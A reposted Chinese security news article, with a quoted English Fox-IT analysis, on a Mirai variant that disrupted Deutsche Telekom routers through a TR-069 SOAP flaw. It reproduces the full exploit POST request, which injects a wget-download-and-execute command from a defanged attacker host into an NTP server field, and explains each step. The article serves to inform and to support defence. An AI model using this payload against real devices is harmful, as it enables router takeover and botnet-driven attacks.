新版Mirai攻击德国电信之后 又攻击了TalkTalk公司和PostOffice宽带 合勤科技受牵连【转】

道。

合勤科技与世界网络设备商、电信公司及ISP业者密切合作，致力于提供各式整合网络IP技术解决方案，包括：局端设备、客户端设备、网络安全应用与无线区域及广域网络设备，产品涉及家庭SOHO、中小企业用户及电信、网吧、金融、教育、政府等多种专属行业机构。

Mirai物联网恶意软件攻击德国电信事件

周一，Mirai物联网恶意软件攻击了德国电信，据称有4%-5%的Zyxel路由器出现崩溃或受限，受此影响，约有100万德国电信用户出现联网问题。SANS科技研究所安全研究员称，新版本的Mirai主要利用Zyxel路由器产品内置的SOAP服务漏洞，截止发稿时止，Zyxel没有回应。

据一名安全研究员称，黑客已升级Mirai恶意软件以感染更多的设备。Mirai是控制安全性不佳的物联网设备的恶意软件。它的新版本找到了一个新的猎物：德国电信存在漏洞的互联网路由器。

德国电信在周一报告称，这一新Mirai版本的传播已导致近一百万德国电信用户出现互联网连接问题。

德国电信将这次问题归咎于Mirai这个臭名昭著的恶意软件。它已经被发现感染了超过50万台连接互联网的设备，包括DVR和监控摄像头。

Mirai的升级版本出现 可以控制Zyxel路由器

SANS科技研究所安全研究员Johannes Ullrich说，然而，这一Mirai版本是升级过的版本。他一直在观察感染事件，并表示它们被专门设计来利用Zyxel公司互联网路由器上的漏洞。绿盟科技不久前刚与SANS联合发布了《 威胁情报定义及使用 》白皮书。

Mirai最初被设计用于感染使用脆弱默认登录名和密码的设备。它先在互联网上扫描这些设备，然后利用60多种密码组合尝试登陆。Ullirch说，这一新的Mirai版本也瞄准了Zyxel路由器产品内置的SOAP（简单对象访问协议）服务中的一个漏洞，使得Mirai能接管这些产品的控制权。

来自Fox-IT的分析显示如下

A Mirai botnet using a different spreading approach than the original bot was observed by Fox-IT on Sunday. Just as the original botnet, the bots start attacking other devices on the internet in an attempt to infect them. Where the original bot uses Telnet and a set of default credentials, this version uses a recently documented SOAP exploit.

The bot is using the following POST request on TCP port 7547 to infect other devices:

—-
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>
cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1
</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body></SOAP-ENV:Envelope>
—-

A write-up on how this exploit works is provided by ‘Kenzo2017’ in his blogpost . The exploit is located in the implementation of a service that allows ISPs to configure and modify settings of specific modems using the TR-069 protocol. One of those settings allows, by mistake, the execution of Busybox commands such as wget to download malware. BusyBox is software that provides several stripped-down Unix tools in a single executable file.

In the exploit code you can see that the protocol allows for the ISP to set the NTP-servers which the modems should use, but rather than entering an IP or a hostname, a bash/busybox command is given:

`cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1`

We can break this command up in multiple parts:

– ‘wget’ is used to retrieve the malware from http://l.ocalhost[.]host.
– ‘chmod 777 1’ makes the file executable.
– ‘./1’ executes the malware on the system.

新版Mirai攻击德国电信

目前还不清楚有多少设备受到了感染。但德国电信说，这次网络开始于周日下午，导致其2000万客户中的90万出现了网络连接问题。

德国电信在邮件中说：“这次攻击试图利用恶意软件感染路由器，但未成功，导致4%或5%的路由器崩溃或受限。”

然而，Ullrich的发现表明，新的Mirai版本至少成功地感染了一些设备。为了追踪Mirai的传播，他在周一搭建了一个Web服务器，作为吸引攻击的蜜罐。

他说：“一旦Mirai感染了一个系统，它就会动身去寻找更多的受害者。”

到周一上午为止，他已经发现有10万个不同的IP地址试图访问他的蜜罐。

但Mirai的目的并不仅仅是感染。通过控制成千上万的设备，Mirai可以组建一个僵尸网络或者僵尸机军队，用来发动大规模分布式拒绝服务（DDoS）攻击。

新版本Mirai可能正在酝酿新的DDoS风暴

上个月Mirai感染设备导致十多个顶级美国网站服务中断，就是这么发生的。通过发送压倒性的海量流量淹没DNS服务供应商，DDoS攻击就达到目的。

Ullrich说，他还没发现这一新Mirai版本发动过任何DDoS攻击。但是，德国电信用户遭遇连接中断问题的原因，很可能是这一Mirai版本感染了路由设备并进而使用这些设备的计算资源来感染更多设备。

幸运的是，德国电信已经发布了安全公告，指导用户消除感染。

但Ullrich说，这一新Mirai版本很可能已经感染了其他公司或互联网服务提供商的路由设备，只是他们没发现而已。他估计有一百万到两百万的路由设备很容易被感染。

Zyxel没有立即回应置评请求。

Mirai相关文章请参看

对利比里亚DDoS攻击已停止 Mirai僵尸网络500G攻击单一线路就可以搞瘫一个国家

【报告】 绿盟科技发布2016网络视频监控系统安全报告 台湾、广东、江苏、福建视频系统问题最多

物联网恶意软件Mirai攻击Sierra Wireless工业网关 黑客利用设备默认密码进行固件升级

【报告】 物联网恶意软件“Mirai”源代码被黑客公开 绿盟科技分析报告开放下载

浙江大华摄像头被传用于DDoS攻击  杭州雄迈产品又爆root用户名和密码 欧洲委员会起草安全法规

Level3报告称中国大量摄像头被用于DDoS攻击 据说大华科技监控摄像头有漏洞

【分析】 智慧城市是否有足够的智慧安全？卡巴斯基安全智慧城市计划